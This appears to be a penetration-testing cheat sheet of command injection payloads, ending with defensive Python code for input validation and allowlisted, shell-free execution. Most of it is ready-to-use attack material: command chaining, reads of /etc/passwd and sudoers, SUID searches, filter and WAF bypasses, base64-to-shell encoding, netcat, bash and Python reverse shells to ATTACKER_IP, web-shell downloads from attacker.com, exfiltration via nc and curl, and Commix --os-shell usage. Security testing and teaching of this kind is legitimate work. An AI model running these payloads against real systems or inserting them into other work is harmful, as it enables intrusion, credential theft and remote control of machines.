Command Injection Payloads

Command Injection Payloads Comprehensive collection of command injection payloads and bypass techniques for penetration testing. Basic Command Injection Simple Commands # Basic command execution ; ls | ls & ls && ls || ls # Command chaining ; ls; whoami | ls | cat & ls & whoami && ls && whoami || ls || whoami Information Gathering # System information ; uname -a ; whoami ; id ; pwd ; ls -la ; cat /etc/passwd ; cat /etc/hosts ; cat /proc/version ; cat /proc/cpuinfo ; cat /proc/meminfo Network Information # Network interfaces ; ifconfig ; ip addr ; ip route ; netstat -an ; ss -tuln ; arp -a ; route -n Process Information # Running processes ; ps aux ; ps -ef ; top ; htop ; pstree ; lsof ; fuser Advanced Command Injection File Operations # File reading ; cat /etc/passwd ; head /etc/passwd ; tail /etc/passwd ; more /etc/passwd ; less /etc/passwd ; grep root /etc/passwd ; awk '{print $1}' /etc/passwd ; sed -n '1,10p' /etc/passwd Directory Traversal # Directory listing ; ls -la / ; ls -la /home ; ls -la /var ; ls -la /tmp ; find / -name "*.txt" 2>/dev/null ; find / -name "*.log" 2>/dev/null ; find / -name "*.conf" 2>/dev/null User Enumeration # User information ; cat /etc/passwd ; cut -d: -f1 /etc/passwd ; awk -F: '{print $1}' /etc/passwd ; getent passwd ; id ; whoami ; groups ; last ; w ; who Privilege Escalation # SUID files ; find / -perm -4000 2>/dev/null ; find / -perm -u+s 2>/dev/null ; find / -perm -2000 2>/dev/null ; find / -perm -g+s 2>/dev/null # Sudo capabilities ; sudo -l ; sudo -V ; cat /etc/sudoers ; grep -v '^#' /etc/sudoers Bypass Techniques Character Filtering Bypass # Space bypass ; cat${IFS}/etc/passwd ; cat$IFS/etc/passwd ; cat<tab>/etc/passwd ; cat<newline>/etc/passwd ; cat<carriage_return>/etc/passwd ; cat<form_feed>/etc/passwd ; cat<vertical_tab>/etc/passwd # Quote bypass ; cat /etc/passwd ; cat "/etc/passwd" ; cat '/etc/passwd' ; cat `/etc/passwd` Command Filtering Bypass # Case variation ; Ls ; LS ; lS ; Ls -La ; Ls -LA # Encoding bypass ; echo 
"cat /etc/passwd" | base64 | base64 -d | sh ; echo "cat /etc/passwd" | base64 | base64 -d | bash ; echo "cat /etc/passwd" | base64 | base64 -d | /bin/sh WAF Bypass # Comment bypass ; cat /etc/passwd # ; cat /etc/passwd /* ; cat /etc/passwd */ ; cat /etc/passwd <!-- # Encoding bypass ; cat /etc/passwd ; cat /etc/passwd ; cat /etc/passwd ; cat /etc/passwd Platform-specific Payloads Windows # Basic commands ; dir ; type C:\Windows\System32\drivers\etc\hosts ; whoami ; systeminfo ; ipconfig ; netstat -an ; tasklist ; wmic process list ; wmic service list ; reg query HKLM\SOFTWARE Linux/Unix # Basic commands ; ls ; cat /etc/passwd ; whoami ; uname -a ; ps aux ; netstat -an ; ss -tuln ; ifconfig ; ip addr ; route -n macOS # Basic commands ; ls ; cat /etc/passwd ; whoami ; uname -a ; ps aux ; netstat -an ; lsof -i ; ifconfig ; route -n ; system_profiler Advanced Techniques Reverse Shell # Netcat reverse shell ; nc -e /bin/sh ATTACKER_IP PORT ; nc -e /bin/bash ATTACKER_IP PORT ; nc -e /bin/sh ATTACKER_IP PORT ; nc -e /bin/bash ATTACKER_IP PORT # Bash reverse shell ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 # Python reverse shell ; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' File Upload # Download file ; wget http://attacker.com/shell.php ; curl -O http://attacker.com/shell.php ; nc -l -p 1234 > shell.php ; python -c "import urllib; urllib.urlretrieve('http://attacker.com/shell.php', 'shell.php')" Data Exfiltration # Send data to attacker ; cat /etc/passwd | nc ATTACKER_IP PORT ; cat /etc/passwd | curl -X POST -d @- http://attacker.com/collect ; cat /etc/passwd | base64 | nc ATTACKER_IP PORT ; tar -czf - /etc/passwd | nc ATTACKER_IP PORT Testing Tools Commix # Basic scan python3 commix.py -u 
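"http://target.com/page.php?cmd=test"
# With POST data
python3 commix.py -u "http://target.com/page.php" --data="cmd=test"
# With cookies
python3 commix.py -u "http://target.com/page.php?cmd=test" --cookie="PHPSESSID=abc123"
# OS shell
python3 commix.py -u "http://target.com/page.php?cmd=test" --os-shell

### Custom Script

```python
import requests
import re

def test_command_injection(url, param, payload):
    data = {param: payload}
    response = requests.post(url, data=data)

    # Check for command injection indicators
    indicators = [
        "root:", "bin/bash", "bin/sh", "uid=", "gid=", "groups=",
        "total", "drwx", "-rw-", "Directory of", "Volume in drive"
    ]

    for indicator in indicators:
        if indicator in response.text:
            print(f"Command injection detected: {payload}")
            break

# Test payloads
payloads = [
    "; ls", "| ls", "& ls", "&& ls", "|| ls",
    "; whoami", "| whoami", "& whoami", "&& whoami", "|| whoami"
]

for payload in payloads:
    test_command_injection("http://target.com/command.php", "cmd", payload)
```

## Prevention and Mitigation

### Input Validation

Filtering characters is only the first layer: a value that survives the check below is still a user-chosen string, so the program it names must additionally be matched against an allowlist of permitted commands (see `safe_command_execution`). An allowlist makes a separate "dangerous characters" blocklist redundant — every shell metacharacter (`; | & $ \` ( ) < >`, quotes, whitespace) is already outside the permitted set.

```python
import re

# A single token of letters, digits, '-', '_' and '.'; anything else,
# including whitespace and the empty string, is rejected.
_SAFE_TOKEN = re.compile(r"[A-Za-z0-9._-]+")


def validate_command(input_str: str) -> bool:
    """Return True when *input_str* is one allowlisted token.

    This rejects every shell metacharacter, but it does not decide whether
    the named program may be run at all; that is the caller's allowlist job.
    """
    # fullmatch() rather than "^...$": "$" would accept a trailing newline.
    return _SAFE_TOKEN.fullmatch(input_str) is not None
```

### Command Execution

```python
import subprocess

# Programs this code path may launch, keyed by the name a caller can pass and
# resolved to an absolute path so neither PATH nor the user string decides
# what runs. Paths are typical Linux locations; adjust for the deployment.
ALLOWED_COMMANDS = {
    "whoami": "/usr/bin/whoami",
    "ls": "/bin/ls",
}


def safe_command_execution(command, args=(), timeout=30):
    """Run an allowlisted program without a shell; return (stdout, stderr).

    ``command`` must pass ``validate_command`` and be a key of
    ``ALLOWED_COMMANDS``. ``args`` become separate argv entries, so a value
    such as "; id" reaches the program as literal text. Argument injection
    (a leading "-" parsed as a flag) is still possible and must be checked per
    program, e.g. by validating each arg or inserting "--" where supported.
    Raises ValueError for a rejected command and subprocess.TimeoutExpired
    when the child exceeds ``timeout`` seconds.
    """
    if not validate_command(command) or command not in ALLOWED_COMMANDS:
        raise ValueError("Invalid command")
    argv = [ALLOWED_COMMANDS[command], *map(str, args)]
    # shell=False is the property that keeps metacharacters inert; it is the
    # default, but spelled out because the sandbox example relies on it too.
    result = subprocess.run(
        argv,
        shell=False,
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    return result.stdout, result.stderr
```

### Sandboxing

A temporary working directory is not an isolation boundary: the child keeps the caller's uid, network and filesystem access, so real sandboxing needs an OS mechanism (a separate unprivileged user, container/namespaces, seccomp or similar). The example below therefore only scopes relative paths — and never hands the string to a shell, because `shell=True` on user input would be the command-injection bug this page is about.

```python
import shlex
import subprocess
import tempfile


def sandboxed_execution(command, timeout=30):
    """Run *command* in a throw-away cwd and return (stdout, stderr).

    ``command`` is a list (program followed by its arguments). A string is
    accepted for compatibility and split with shlex — it is never parsed by
    a shell, so "ls; id" becomes the two literal tokens "ls;" and "id".
    The program itself should still come from an allowlist, as in
    ``safe_command_execution``.
    """
    argv = shlex.split(command) if isinstance(command, str) else list(command)
    with tempfile.TemporaryDirectory() as temp_dir:
        # cwd= affects only the child; os.chdir() would move the whole
        # process and never be restored.
        result = subprocess.run(
            argv,
            shell=False,
            capture_output=True,
            text=True,
            timeout=timeout,
            cwd=temp_dir,
        )
    return result.stdout, result.stderr
```

## Testing Checklist

- Test all input fields
- Test with different HTTP methods
- Test with different content types
- Test with different command separators
- Test with different quote types
- Test with different encoding methods
- Test with different bypass techniques
- Test with different WAF bypasses
- Test with different platform-specific commands
- Test with different privilege escalation techniques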
